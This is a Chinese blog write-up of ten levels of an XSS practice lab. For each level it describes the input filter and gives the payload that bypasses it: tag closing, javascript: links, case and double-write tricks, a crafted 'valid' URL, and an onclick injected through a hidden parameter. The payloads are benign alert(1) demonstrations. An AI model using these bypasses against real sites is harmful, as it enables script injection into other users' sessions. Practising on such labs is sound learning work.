前言
最近刚学到xss,老师发了一个靶场,刚好拿来练练手,提升下技术,本文用于记录。
level-1
查看源代码,发现有参数name,那么尝试最基本的攻击,通关成功。
level-2
利用第一关的代码,发现输入的值在input标签内,这时尝试闭合标签
1
| "><script>alert(1)</script> |
level-3
继续尝试利用第一关的代码,发现<>被过滤,此时尝试JavaScript鼠标事件。
level-4
查看源代码,发现跟第三关及其相似,此时采用双引号闭合标签,插入JavaScript鼠标事件
level-5
输入第一关代码,发现script被过滤成scr_ipt
按照第四关的方法时,发现onclick被过滤成o_nclick
此时,我们可以尝试使用a标签
1
| "> <a href="javascript:alert(1)">233</a> |
level-6
利用第五关的方法,发现href被过滤成hr_ef,script跟on事件同第五关。
此时,我们尝试利用大小写绕过
1
| "> <Script>alert(1)</script> // |
level-7
根据前几关的方法尝试,发现都不可行,大小写也被过滤。且script,on,href被置空。
此时,我们尝试利用双写绕过。
1
| "><sscriptcript>alert(1)</sscriptcript> |
level-8
按套路,将前几关的代码都试了一遍,全部都不行,不是被过滤就是转义。
此时,我们可以尝试利用实体编码绕过
level-9
跟第八关一样的套路,输入代码,提示链接不合法。
既然链接不合法,那我们就构造一个合法的链接
1
| javascript:alert(1)//http: |
level-10
直接查看源代码,发现有三个参数,尝试往URL里加参数
1
| ?keyword=hack&t_link=1&t_history&t_sort=3 |
发现只有t_sort被写入了, 所以注入点就是t_sort参数
这里提供两种方法,
一、向t_sort传入代码
1
| keyword=test&t_sort="type="text" onclick = "alert(1) |
二、修改表单的工作方式,采用按钮提交,此方法可将代码永久注入到该页面
1 2 3 4 5 6
| < form id="search" action="level10.php">
< input name="t_link" value="" type="hidden">
< input name="t_history" value="" type="hidden">
< input name="t_sort" value="" type="text">
< input value="提交" type="submit">
< /form> |
行云博客 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!